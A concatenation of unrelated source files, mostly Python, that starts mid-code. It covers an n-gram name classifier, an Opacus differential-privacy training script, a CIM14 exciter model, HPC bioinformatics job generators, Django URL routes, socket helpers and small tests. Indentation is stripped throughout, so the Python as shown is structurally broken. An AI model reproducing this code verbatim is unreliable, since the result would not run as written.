dic[names[i][j:j+k]] = [
ctr, ctr * float(train[i, 5]),
ctr * float(train[i, 6]), ctr * float(train[i, 7]),
ctr * float(train[i, 8]), ctr * float(train[i, 9]),
ctr * float(train[i, 10])]
else:
# print(i,j)
temp = dic[names[i][j:j+k]]
dic[names[i][j:j+k]] = [
temp[0]+ctr, temp[1] + ctr * float(train[i, 5]),
temp[2]+ctr * float(train[i, 6]),
temp[3]+ctr * float(train[i, 7]),
temp[4]+ctr * float(train[i, 8]),
temp[5]+ctr * float(train[i, 9]),
temp[6]+ctr * float(train[i, 10])]
except:
pass
names_test = test[:, 0]
percent = test[:, 5:]
ctr = 0
ctr2 = 0
for i in range(len(names_test)):
# print(i)
te = names_test[i]
l = []
try:
for j in range(len(te)-k+1):
l.append(dic[te[j:j+k]])
except:
pass
if not l:
# print("NA")
pass
else:
ctr += 1
l = np.array(l)
l2 = np.prod(l, axis=0)
try:
out = np.array(percent[i, :], dtype='|S4')
out = out.astype(np.float)
except:
pass
tr_label = np.argmax(out)
pr_label = np.argmax(l2[1:])
# print(i,pr_label)
if pr_label == tr_label:
ctr2 += 1
print(ctr2/ctr)
|
import math
def gauss(n):
return (((n * n) + n) / 2)
def sumDivisibleBy(x, limit):
return x * gauss(limit // x)
no1 = int(input('First number: '))
no2 = int(input('Second number: '))
limit = int(input('Limit: ')) - 1
result = sumDivisibleBy(no1, limit) + sumDivisibleBy(no2, limit) - sumDivisibleBy(no1 * no2, limit)
print(result)
|
# -*- coding: utf-8 -*-
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
import pickle
import tensorflow as tf
from text_generator import Keras_Text_Generator
def main(input_filepath, output_filepath):
""" Runs data processing scripts to turn raw data from (../raw) into
cleaned data ready to be analyzed (saved in ../processed).
"""
logger = logging.getLogger(__name__)
logger.info('building features...')
gen = Keras_Text_Generator()
data = gen.load_and_create_dataset(input_filepath, seq_length=300)
with open(output_filepath, 'wb') as f:
pickle.dump(data, f)
# writer = tf.data.experimental.TFRecordWriter(output_filepath)
# writer.write(gen.dataset)
# with open(output_filepath, 'wb') as f:
# pickle.dump(gen.dataset, f)
logger.info('Features built!')
return None
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
# not used in this stub but often useful for finding various files
# project_dir = Path(__file__).resolve().parents[2]
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
# load_dotenv(find_dotenv())
main(snakemake.input[0], snakemake.output.rs) |
'''
Opacus experiments for all the models
'''
import time
import torch
from torch import nn, optim
import data
from experimental.privacy_utils import autograd_grad_sample
from experimental.privacy_utils.privacy_engine import EfficientPrivacyEngine
from pytorch import get_data, model_dict
import utils
def main(args):
print(args)
assert args.dpsgd
torch.backends.cudnn.benchmark = True
mdict = model_dict.copy()
train_data, train_labels = get_data(args)
model = mdict[args.experiment](vocab_size=args.max_features, batch_size=args.batch_size).cuda()
optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0)
loss_function = nn.CrossEntropyLoss(reduction="none") if args.experiment != 'logreg' else nn.BCELoss(
reduction="none")
privacy_engine = EfficientPrivacyEngine(
model,
batch_size=args.batch_size,
sample_size=len(train_data),
alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),
noise_multiplier=args.sigma,
max_grad_norm=args.max_per_sample_grad_norm,
)
privacy_engine.attach(optimizer)
timings = []
for epoch in range(1, args.epochs + 1):
start = time.perf_counter()
dataloader = data.dataloader(train_data, train_labels, args.batch_size)
for batch_idx, (x, y) in enumerate(dataloader):
x, y = x.cuda(non_blocking=True), y.cuda(non_blocking=True)
outputs = model(x)
loss = loss_function(outputs, y)
autograd_grad_sample.set_hooks_mode(mode="norm")
first_loss = loss.mean(dim=0)
first_loss.backward(retain_graph=True)
autograd_grad_sample.set_hooks_mode(mode="grad")
coef_sample = optimizer.privacy_engine.get_coef_sample()
second_loss = (coef_sample * loss).sum(dim=0)
second_loss.backward()
optimizer.step()
optimizer.zero_grad()
torch.cuda.synchronize()
duration = time.perf_counter() - start
print("Time Taken for Epoch: ", duration)
timings.append(duration)
if args.dpsgd:
epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(args.delta)
print(f"Train Epoch: {epoch} \t"
f"(ε = {epsilon}, δ = {args.delta}) for α = {best_alpha}")
else:
print(f"Train Epoch: {epoch}")
if not args.no_save:
utils.save_runtimes(__file__.split('.')[0], args, timings)
else:
print('Not saving!')
print('Done!')
if __name__ == '__main__':
# python fast_torch_dp.py ffnn --dpsgd --batch_size 100000 --dummy_data --epochs 100000
parser = utils.get_parser(model_dict.keys())
parser.add_argument(
"--sigma",
type=float,
default=1.0,
help="Noise multiplier (default 1.0)",
)
parser.add_argument(
"-c",
"--max-per-sample-grad_norm",
type=float,
default=1.0,
help="Clip per-sample gradients to this norm (default 1.0)",
)
parser.add_argument(
"--delta",
type=float,
default=1e-5,
help="Target delta (default: 1e-5)",
)
args = parser.parse_args()
main(args)
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.ExcitationSystems.ExcitationSystem import ExcitationSystem
class ExcAC5A(ExcitationSystem):
"""IEEE (1992/2005) AC5A Model The model designated as Type AC5A, is a simplified model for brushless excitation systems. The regulator is supplied from a source, such as a permanent magnet generator, which is not affected by system disturbances. Unlike other ac models, this model uses loaded rather than open circuit exciter saturation data in the same way as it is used for the dc models. Because the model has been widely implemented by the industry, it is sometimes used to represent other types of systems when either detailed data for them are not available or simplified models are required.
"""
def __init__(self, ka=0.0, e1=0.0, kf=0.0, te=0.0, vrmin=0.0, vrmax=0.0, se2=0.0, tf3=0.0, e2=0.0, ke=0.0, tr=0.0, se1=0.0, tf2=0.0, tf1=0.0, ta=0.0, *args, **kw_args):
"""Initialises a new 'ExcAC5A' instance.
@param ka: Gain (> 0.)
@param e1: Field voltage value 1 (> 0.)
@param kf: Rate feedback gain (>= 0.)
@param te: Exciter time constant, sec. (> 0.)
@param vrmin: Minimum controller output (< 0.)
@param vrmax: Maximum controller output (> 0.)
@param se2: Saturation factor at e2 (>= 0.)
@param tf3: Rate feedback lead time constant
@param e2: Field voltage value 2. (> 0.)
@param ke: Exciter field resistance line slope
@param tr: Filter time constant (>= 0.)
@param se1: Saturation factor at e1 (>= 0.)
@param tf2: Rate feedback lag time constant (>= 0.)
@param tf1: Rate feedback lag time constant (> 0.)
@param ta: Time constant (> 0.)
"""
#: Gain (> 0.)
self.ka = ka
#: Field voltage value 1 (> 0.)
self.e1 = e1
#: Rate feedback gain (>= 0.)
self.kf = kf
#: Exciter time constant, sec. (> 0.)
self.te = te
#: Minimum controller output (< 0.)
self.vrmin = vrmin
#: Maximum controller output (> 0.)
self.vrmax = vrmax
#: Saturation factor at e2 (>= 0.)
self.se2 = se2
#: Rate feedback lead time constant
self.tf3 = tf3
#: Field voltage value 2. (> 0.)
self.e2 = e2
#: Exciter field resistance line slope
self.ke = ke
#: Filter time constant (>= 0.)
self.tr = tr
#: Saturation factor at e1 (>= 0.)
self.se1 = se1
#: Rate feedback lag time constant (>= 0.)
self.tf2 = tf2
#: Rate feedback lag time constant (> 0.)
self.tf1 = tf1
#: Time constant (> 0.)
self.ta = ta
super(ExcAC5A, self).__init__(*args, **kw_args)
_attrs = ["ka", "e1", "kf", "te", "vrmin", "vrmax", "se2", "tf3", "e2", "ke", "tr", "se1", "tf2", "tf1", "ta"]
_attr_types = {"ka": float, "e1": float, "kf": float, "te": float, "vrmin": float, "vrmax": float, "se2": float, "tf3": float, "e2": float, "ke": float, "tr": float, "se1": float, "tf2": float, "tf1": float, "ta": float}
_defaults = {"ka": 0.0, "e1": 0.0, "kf": 0.0, "te": 0.0, "vrmin": 0.0, "vrmax": 0.0, "se2": 0.0, "tf3": 0.0, "e2": 0.0, "ke": 0.0, "tr": 0.0, "se1": 0.0, "tf2": 0.0, "tf1": 0.0, "ta": 0.0}
_enums = {}
_refs = []
_many_refs = []
|
def quicksort(arr):
if len(arr) < 2:
return arr
else:
pivot = arr[0]
less = [i for i in arr[1:] if i <= pivot]
greater = [i for i in arr[1:] if i > pivot]
return quicksort(less) + [pivot] + quicksort(greater)
test_array = [12,2,4,6,3,18]
print(quicksort(test_array)) |
"""
1. copy dna-CDS to work directory
2. translate dna
3. plot sequence length histogram for dna, untranslated dna, protein
4. run cd-hit on protein
"""
import argparse
import os
import io
import stat
import subprocess
def pipeline():
args = get_args()
qsub_params = [
'-l', 'place=pack:shared',
'-M', 'jklynch@email.arizona.edu',
'-m', 'bea',
'-q', 'standard',
'-W', 'group_list=bhurwitz'
]
work_scripts_dir = os.path.join(args.work_dir, 'scripts')
if not os.path.exists(work_scripts_dir):
os.makedirs(work_scripts_dir)
_, dna_cds_known_file_name = os.path.split(args.orig_dna_cds_known_path)
work_dna_cds_known_path = os.path.join(args.work_dir, dna_cds_known_file_name)
###########################################################################
# copy Scott's original data file
if os.path.exists(work_dna_cds_known_path):
print('"{}" already exists'.format(work_dna_cds_known_path))
else:
copy_script_path = os.path.join(work_scripts_dir, 'copy.sh')
write_script(script_path=copy_script_path, script_text="""\
#!/bin/bash
pwd
mkdir -p {work_dir}
cp {orig_dna_cds_known_path} {work_dna_cds_known_path}
""".format(**vars(args), work_dna_cds_known_path=work_dna_cds_known_path),
job_name='crc-mouse-copy',
select=1,
ncpus=1,
mem='6gb',
pcmem='6gb',
place='pack:shared',
walltime='00:10:00',
cput='00:10:00',
stderr_fp='crc-mouse-copy.stderr',
stdout_fp='crc-mouse-copy.stdout',
qsub_params=qsub_params
)
if args.submit:
qsub_script(script_path=copy_script_path)
else:
print('"{}" will not be submitted'.format(copy_script_path))
###########################################################################
###########################################################################
# translate dna to protein
# this job ran in 00:42:31 on ocelote
translate_script_path = os.path.join(work_scripts_dir, 'translate.sh')
write_script(script_path=translate_script_path, script_text= """\
#!/bin/bash
source activate mouse
python {scripts_dir}/translate-microbial-dna-CDS.py \\
-i {work_dna_cds_known_path} \\
-o {work_dir}/crc-mouse-protein-from-known-only.fa \\
-u {work_dir}/crc-mouse-untranslated-microbial-dna-CDS-known.fa \\
-l {translation_limit}
""".format(**vars(args), work_dna_cds_known_path=work_dna_cds_known_path),
job_name='crc-mouse-translate',
select=1,
ncpus=1,
mem='6gb',
pcmem='6gb',
place='pack:shared',
walltime='01:00:00',
cput='01:00:00',
stderr_fp='mouse_translate.stderr',
stdout_fp='mouse_translate.stdout',
qsub_params=qsub_params
)
if args.submit:
qsub_stdout, _ = qsub_script(script_path=translate_script_path)
translate_job_id = qsub_stdout.strip()
else:
print('"{}" will not be submitted'.format(translate_script_path))
translate_job_id = None
###########################################################################
###########################################################################
# cluster proteins with CD-HIT
# had to build cd-hit on ocelote
# $ git clone https://github.com/weizhongli/cdhit.git
# $ cd cdhit
# $ make
# this job ran in 00:19:50 (06:46:32 cput) on one node of ocelote (28 cores)
# cput does not match up with walltime
cluster_script_path = os.path.join(work_scripts_dir, 'cluster_proteins.sh')
write_script(script_path=cluster_script_path, script_text="""\
#!/bin/bash
{cd_hit_bin} \\
-i {work_dir}/crc-mouse-protein-from-known-only.fa \\
-o {work_dir}/crc-mouse-cd-hit-c90-n5-protein-known.db \\
-c 0.9 -n 5 -M 168000000 -d 0 -T 28
""".format(**vars(args)),
depend='afterok:' + translate_job_id,
job_name='crc-mouse-cdhit',
select=1,
ncpus=28,
mem='168gb',
pcmem='6gb',
place='pack:shared',
walltime='00:30:00',
cput='14:00:00',
stderr_fp='mouse_cluster.stderr',
stdout_fp='mouse_cluster.stdout',
qsub_params=qsub_params
)
if args.submit:
cluster_job_id, _ = qsub_script(script_path=cluster_script_path)
else:
print('"{}" will not be submitted'.format(cluster_script_path))
cluster_job_id = None
###########################################################################
def get_args():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-w', '--work-dir', default=os.path.join(os.getcwd(), 'work'))
arg_parser.add_argument('-s', '--scripts-dir', default=os.path.join(os.getcwd(), 'scripts'))
arg_parser.add_argument(
'-i', '--orig-dna-cds-known-path',
default='/rsgrps/bhurwitz/scottdaniel/extract-fasta/data/dna-of-CDS-from-known-only.fa')
arg_parser.add_argument('-l', '--translation-limit', type=int, default=-1)
arg_parser.add_argument('--cd-hit-bin', default='~/local/cdhit/cd-hit')
arg_parser.add_argument('--submit', action='store_true', default=False)
args = arg_parser.parse_args()
print(args)
return args
def write_script(script_path, script_text, **kwargs):
print(kwargs)
with open(script_path, 'wt') as script_file:
script_text_buffer = io.StringIO(script_text)
script_file.write(script_text_buffer.readline().lstrip())
script_file.write("""\
#PBS -N {job_name}
#PBS -q standard
#PBS -W group_list=bhurwitz
#PBS -l select={select}:ncpus={ncpus}:mem={mem}:pcmem={pcmem}
#PBS -l place={place}
#PBS -l cput={cput}
#PBS -l walltime={walltime}
#PBS -m bea
#PBS -M jklynch@email.arizona.edu
#PBS -e {stderr_fp}
#PBS -o {stdout_fp}
""".format(**kwargs))
if 'depend' in kwargs and kwargs['depend'] is not None:
script_file.write("""\
#PBS -W depend={depend}
""".format(**kwargs))
if 'place' in kwargs and kwargs['place'] is not None:
script_file.write("""\
#PBS -l place={place}
""".format(**kwargs))
for line in script_text_buffer:
script_file.write(line.lstrip())
os.chmod(script_path, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR)
return script_path
def run_script(script_path):
print('running "{}"'.format(script_path))
p = subprocess.run(
[script_path],
shell=True,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
print('stderr:\n{}'.format(p.stderr.decode('utf-8')))
print('stdout:\n{}'.format(p.stdout.decode('utf-8')))
def qsub_script(script_path):
print('qsub "{}"'.format(script_path))
subprocess_cmd_list = ['qsub', script_path]
print(subprocess_cmd_list)
try:
p = subprocess.run(
subprocess_cmd_list,
shell=False,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
stderr = p.stderr.decode('utf-8')
stdout = p.stdout.decode('utf-8')
print('stderr:\n{}'.format(p.stderr.decode('utf-8')))
print('stdout:\n{}'.format(p.stdout.decode('utf-8')))
return stdout, stderr
except FileNotFoundError as e:
# this usually means I am testing on my laptop
print('no qsub executable')
run_script(script_path=script_path)
return None, None
if __name__ == '__main__':
pipeline()
|
"""
[ref.href] leetcode.com/problems/contains-duplicate-ii
"
Given an array of integers and an integer k, find out whether
there are two distinct indices i and j in the array such that
nums[i] = nums[j] and the difference between i and j is at most k.
"
"""
class Solution(object):
def containsNearbyDuplicate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: bool
"""
dups = {}
i = 0
for n in nums:
if n in dups:
j = dups[n]
if i - j <= k:
return True
dups[n] = i
i += 1
return False
|
import os
import numpy as np
import pandas as pd
data = pd.DataFrame()
col_names = ["EmployeeName",
"JobTitle",
"BasePay",
"OvertimePay",
"OtherPay",
"Benefits",
"TotalPay",
"TotalPayBenefits",
"Year",
"Notes",
"Agency"]
for year in range(2011, 2015):
if year==2014:
col_names = col_names + ["Status"]
year_data = pd.read_csv("input/san-francisco-%d.csv" % year,
header=None,
skiprows=1,
names=col_names)
if year==2011:
year_data["Benefits"] = np.nan # originally "Not Provided"
if year<2014:
year_data.insert(year_data.shape[1], "Status", np.nan)
data = pd.concat([data, year_data])
data.insert(0, "Id", list(range(1, len(data)+1)))
data.to_csv("output/Salaries.csv", index=False)
|
'''
Models
------
This is currently required for:
$> python manage.py test rpc4django
to run.
see: http://code.djangoproject.com/ticket/7198
''' |
import os
import textwrap
import config
class DoNotUseThisSetting():
def __repr__(self):
raise Exception('DoNotUseThisSetting')
def inject(region, paths, fmt):
assert config.qtl_mode in ['nominal', 'permutation']
chrom = region.split(':')[0]
def register_path(fmt):
path = fmt.format(config.job_directory, region)
if path not in paths:
paths.append(path)
return path
def intge(var, n):
assert int(var) >= n
return int(var)
fmt = textwrap.dedent(fmt).lstrip('\n')
return fmt.format(
exposure_bed = config.exposure_bed.format(chr=chrom),
outcome_bed = config.outcome_bed.format(chr=chrom),
exposure_qtl = register_path('{0}/{1}/exposure/exposure.nom.txt'),
outcome_qtl = register_path('{0}/{1}/outcome/outcome.nom.txt'),
exposure_cojo_dir = register_path('{0}/{1}/exposure/exposure.cojo/'),
outcome_cojo_dir = register_path('{0}/{1}/outcome/outcome.cojo/'),
gsmr_combinations = register_path('{0}/{1}/gsmr/gsmr_combinations.txt'),
gsmr_exposure = register_path('{0}/{1}/gsmr/gsmr_exposure.txt'),
gsmr_outcome = register_path('{0}/{1}/gsmr/gsmr_outcome.txt'),
gsmr_out_dir = register_path('{0}/{1}/gsmr/combinations/'),
gsmr_out_filtered = register_path('{0}/{1}.gsmr'),
gsmr_out=DoNotUseThisSetting(),
gsmr_plot_dir = register_path('{0}/{1}/plot/'),
gen_bed = register_path('{0}/{1}/gsmr/bed'),
qtl_extra_opts = config.qtl_extra_opts,
covariance_exposure = getattr(config, 'covariance_exposure', False) or config.covariance,
covariance_outcome = getattr(config, 'covariance_outcome', False) or config.covariance,
vcf = config.vcf_per_chr.format(chr=chrom),
sumstats = config.sumstats_per_chr.format(chr=chrom),
job_directory = config.job_directory,
qtl_nom_pvalue = config.qtl_nom_pvalue if config.qtl_mode == 'nominal' else DoNotUseThisSetting(),
qtl_permutations = config.qtl_permutations if config.qtl_mode == 'permutation' else DoNotUseThisSetting(),
qtl_mode = config.qtl_mode,
qtl_window = config.qtl_window,
qtl_seed = config.qtl_seed,
#region = region if ':' in region else '{0:02d}'.format(int(chrom)), # hacky
software_rscript = config.software_rscript,
MAF_threshold_exposure = float(config.maf_threshold_exposure),
MAF_threshold_outcome = float(config.maf_threshold_outcome),
excl_cov_exposure_file = config.excl_cov_exposure_file,
excl_cov_outcome_file = config.excl_cov_outcome_file,
gsmr_r2 = config.gsmr_r2,
gsmr_p = config.gsmr_p,
arg_qtltools_mode = "--nominal " + str(config.qtl_nom_pvalue)
if config.qtl_mode == 'nominal' else "--permute " + str(config.qtl_permutations),
qtl_jobs=intge(config.qtl_jobs, 1),
gsmr_max_job_idx=intge(config.gsmr_jobs, 1)-1,
)
def jobs_for_region(region):
paths = []
qtltools_exposure = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 35:00:00
#SBATCH --mem 5G
#SBATCH --array=1-{qtl_jobs}
if [ ! -f "{exposure_qtl}.${{SLURM_ARRAY_TASK_ID}}" ]; then
vendor/qtltools_v1.2-stderr cis \
{arg_qtltools_mode} \
--vcf "{vcf}" \
--bed "{exposure_bed}" \
--cov "{covariance_exposure}" \
--out "{exposure_qtl}".${{SLURM_ARRAY_TASK_ID}} \
--window "{qtl_window}" \
--exclude-covariates "{excl_cov_outcome_file}" \
--seed "{qtl_seed}" \
"{qtl_extra_opts}" \
--std-err \
--chunk ${{SLURM_ARRAY_TASK_ID}} ${{SLURM_ARRAY_TASK_COUNT}}
fi
''')
qtltools_exposure_collect = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 4:00:00
#SBATCH --mem 20G
if [ -z "$(ls -A {exposure_cojo_dir} | head -n 1)" ]; then
python3 _scripts/split_qtl_to_cojo.py \
"{exposure_qtl}".'*' \
"{sumstats}" \
"{exposure_cojo_dir}" \
"{MAF_threshold_exposure}"
fi
find "{exposure_cojo_dir}" -type f \
| awk -F / '{{print $NF " " $0}}' \
> "{gsmr_exposure}"
''')
qtltools_outcome = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 35:00:00
#SBATCH --mem 5G
#SBATCH --array=1-{qtl_jobs}
if [ ! -f "{outcome_qtl}.${{SLURM_ARRAY_TASK_ID}}" ]; then
vendor/qtltools_v1.2-stderr cis \
{arg_qtltools_mode} \
--vcf "{vcf}" \
--bed "{outcome_bed}" \
--cov "{covariance_outcome}" \
--out "{outcome_qtl}".${{SLURM_ARRAY_TASK_ID}} \
--window "{qtl_window}" \
--exclude-covariates "{excl_cov_exposure_file}" \
--seed "{qtl_seed}" \
"{qtl_extra_opts}" \
--std-err \
--chunk ${{SLURM_ARRAY_TASK_ID}} ${{SLURM_ARRAY_TASK_COUNT}}
fi
''')
qtltools_outcome_collect = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 2:00:00
#SBATCH --mem 20G
if [ -z "$(ls -A {outcome_cojo_dir} | head -n 1)" ]; then
python3 _scripts/split_qtl_to_cojo.py \
"{outcome_qtl}".'*' \
"{sumstats}" \
"{outcome_cojo_dir}" \
"{MAF_threshold_outcome}"
fi
find "{outcome_cojo_dir}" -type f \
| awk -F / '{{print $NF " " $0}}' \
> "{gsmr_outcome}"
''')
create_bed = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 1:00:00
#SBATCH --mem 40G
#!/usr/bin/env bash
if [ ! -f "{gen_bed}.bed" ]; then
plink2 --make-bed \
--vcf "{vcf}" \
--out "{gen_bed}"
fi
''')
gsmr_pairs = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 15:00:00
#SBATCH --mem 60G
if [ ! -f "{gsmr_combinations}" ]; then
python3 _scripts/gsmr_pairs.py \
"{gsmr_exposure}" \
"{gsmr_outcome}" \
> "{gsmr_combinations}"
fi
''')
run_gsmr = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 2:00:00
#SBATCH --mem 40G
#SBATCH --array 0-{gsmr_max_job_idx}
cat "{gsmr_combinations}" \
| awk "(NR-1)%${{SLURM_ARRAY_TASK_COUNT}} == ${{SLURM_ARRAY_TASK_ID}}" \
| while read line; do
if [ ! -f "{gsmr_out_dir}"/"${{combination}}.log" ]; then
combination=$(echo "$line" | awk '{{print $1 "-" $2}}')
exposure=$(echo "$line" | awk '{{print $1}}')
outcome=$(echo "$line" | awk '{{print $2}}')
exposure_file=$(echo "$line" | awk '{{print $3}}')
outcome_file=$(echo "$line" | awk '{{print $4}}')
echo "${{exposure}}" "${{exposure_file}}" > "{gsmr_out_dir}/${{combination}}.gsmr_exposure.txt"
echo "${{outcome}}" "${{outcome_file}}" > "{gsmr_out_dir}/${{combination}}.gsmr_outcome.txt"
gcta_1.92.1b6 \
--bfile "{gen_bed}" \
--gsmr-file \
"{gsmr_out_dir}/${{combination}}.gsmr_exposure.txt" \
"{gsmr_out_dir}/${{combination}}.gsmr_outcome.txt" \
--gsmr-direction 2 \
--out "{gsmr_out_dir}"/"${{combination}}" \
--gwas-thresh {gsmr_p} \
--effect-plot \
--clump-r2 {gsmr_r2} || true
fi
done
''')
gsmr_summarize = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 8:00:00
#SBATCH --mem 40G
(
cat "{gsmr_out_dir}"/*.gsmr | head -n 1
cat "{gsmr_out_dir}"/*.gsmr | grep -vE 'Exposure|nan'
) | column -t > "{gsmr_out_filtered}"
python3 _scripts/summarize_gsmr.py \
"{gsmr_out_filtered}" \
"{exposure_qtl}.*" \
"{outcome_qtl}.*"\
> "{gsmr_out_filtered}.summary"
''')
plot_gsmr = inject(region, paths, r'''
#!/usr/bin/env bash
#SBATCH --time 8:00:00
#SBATCH --mem 40G
for file in "{gsmr_out_dir}*.eff_plot.gz"
do
base={gsmr_out_dir}$(basename $file .eff_plot.gz)
echo $base
"/hpc/local/CentOS7/dhl_ec/software/R-3.4.0/bin/Rscript" _scripts/run_gsmr_plot.r \
"$file" \
"$base.gsmr" \
"{gsmr_plot_dir}"
done
''')
basedirs = sorted(list(set(map(os.path.dirname, paths))))
create_dirs = '\n'.join('mkdir -p {0}'.format(basedir) for basedir in basedirs) + '\n'
create_dirs = textwrap.dedent(r'''
#!/usr/bin/env bash
{0}
'''.lstrip('\n')).format(create_dirs)
return [
dict(jobname='create_dirs', job=create_dirs, depends=[]),
dict(jobname='exp', job=qtltools_exposure, depends=['create_dirs']),
dict(jobname='expc', job=qtltools_exposure_collect, depends=['exp']),
dict(jobname='out', job=qtltools_outcome, depends=['create_dirs']),
dict(jobname='outc', job=qtltools_outcome_collect, depends=['out']),
dict(jobname='bed', job=create_bed, depends=['create_dirs']),
dict(jobname='pairs', job=gsmr_pairs, depends=['expc', 'outc', 'bed']),
dict(jobname='gsmr', job=run_gsmr, depends=['pairs']),
dict(jobname='summary', job=gsmr_summarize, depends=['gsmr']),
dict(jobname='plot', job=plot_gsmr, depends=['summary']),
]
|
import numpy as np
from tests.extras import canosa_values
from diagnostics.z_function import get_roots_to_electrostatic_dispersion
def test_z_solver():
k0 = canosa_values.k0
w_real_actual = canosa_values.w_real
w_imag_actual = canosa_values.w_imag
for kk, wr, wi in zip(k0, w_real_actual, w_imag_actual):
answer = get_roots_to_electrostatic_dispersion(wp_e=1.0, vth_e=1.0, k0=kk)
np.testing.assert_almost_equal(wr + 1j * wi, answer, decimal=4)
|
import socket
import base64
from uuid import uuid4
import cv2
import numpy as np
# pylint: disable=no-member, unused-variable
def encodeImg(img):
return base64.b64encode(cv2.imencode(".png", img)[1])
def decodeImg(img):
return cv2.imdecode(np.frombuffer(base64.b64decode(img), dtype=np.uint8), cv2.IMREAD_ANYCOLOR,)
def generateSocket(timeout):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return sock
def getUUID():
return str(uuid4())
# pylint: disable=fixme
# TODO: Make this less fragile? Use socket.bind_to_random_port with zmq?
def getOpenPort():
sock = socket.socket()
sock.bind(('', 0))
_, port = sock.getsockname()
sock.close()
return port
def baseToPubSubPort(base):
return base + 1
|
import unittest
import finance
class TestFinanceFunctions(unittest.TestCase):
def test_symbols(self):
self.assertEqual(type(finance.symbols.dax), type(()))
if __name__ == '__main__':
unittest.main()
|
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from .views import ToDo, Bucket
urlpatterns = [
re_path(r'todos$',
csrf_exempt(ToDo.as_view()),
name="Todos"),
re_path(r'todos/(?P<id>\d+)$',
csrf_exempt(ToDo.as_view()),
name="Todo"),
re_path(r'buckets$',
csrf_exempt(Bucket.as_view()),
name="Buckets"),
]
|
__version__ = '3.0.0'
def get_version():
return __version__
|
# Telegram Bot
token = 'XXX'
# Telegram Chat Owner
api_id = 123
api_hash = 'YYY'
|
from ncvoter.settings import * # noqa: F403
DATABASES['default'].update({ # noqa: F405
'PORT': 5455,
'NAME': 'ncvoter',
'USER': '',
'PASSWORD': '',
})
NCVOTER_DOWNLOAD_PATH = "/Volumes/Untitled/downloads/ncvoter"
NCVHIS_DOWNLOAD_PATH = "/Volumes/Untitled/downloads/ncvhis"
|
#!/usr/bin/env python
# coding=utf-8
import json
import xlwt
import sys
testfile = 'student.json'
savename = '../cache/student.xls'
sheetname = 'student'
def json_to_excel():
studentList = get_json(testfile)
# workbook = xlwt.Workbook()
workbook = xlwt.Workbook(encoding='utf-8') #实际试了编码参数有无utf8,生成的文件md5一样
workbook.set_owner('KaiFromPython')
sheet = workbook.add_sheet(sheetname)
index = 0
for stu in studentList:
str_no = str(stu['stu_no'])
sheet.write(index, 0, str_no)
str_stu_name = str(stu['stu_name'])
sheet.write(index, 1, str_stu_name)
sheet.write(index, 2, str(stu['chinese']))
sheet.write(index, 3, str(stu['math']))
sheet.write(index, 4, str(stu['english']))
index += 1
workbook.save(savename)
# Convert json format file to python object
def get_json(testfile):
with open(testfile, 'r') as f:
# The codec should be the same as the file encoding.
text = f.read()
return json.loads(text)
if __name__ == '__main__':
reload(sys)
sys.setdefaultencoding('utf-8')
json_to_excel()
|
import os
import shutil
class NotADirectoryError(Exception):
"""Indicates a file was found when a directory was expected."""
def __init__(self, directory, message=None):
super(NotADirectoryError, self).__init__(
'Expected a directory, found a file instead at ' + directory)
self.directory = os.path.abspath(directory)
def remove_directory(directory, show_warnings=True):
"""Deletes a directory and its contents.
Returns a list of errors in form (function, path, excinfo)."""
errors = []
def onerror(function, path, excinfo):
if show_warnings:
print 'Cannot delete %s: %s' % (os.path.relpath(directory), excinfo[1])
errors.append((function, path, excinfo))
if os.path.exists(directory):
if not os.path.isdir(directory):
raise NotADirectoryError(directory)
shutil.rmtree(directory, onerror=onerror)
return errors
def copy_files(source_files, target_directory, source_directory=None):
"""Copies a list of files to the specified directory.
If source_directory is provided, it will be prepended to each source file."""
try:
os.makedirs(target_directory)
except: # TODO: specific exception?
pass
for f in source_files:
source = os.path.join(source_directory, f) if source_directory else f
target = os.path.join(target_directory, f)
shutil.copy2(source, target)
def yes_or_no(message):
"""Gets user input and returns True for yes and False for no."""
while True:
print message, '(yes/no)',
line = raw_input()
if line is None:
return None
line = line.lower()
if line == 'y' or line == 'ye' or line == 'yes':
return True
if line == 'n' or line == 'no':
return False
|
from oarepo_nusl_rules import rule_registry
from oarepo_nusl_rules.register import RuleRegistry
def test_register_load():
instance1 = RuleRegistry.Instance()
RuleRegistry.Instance().load()
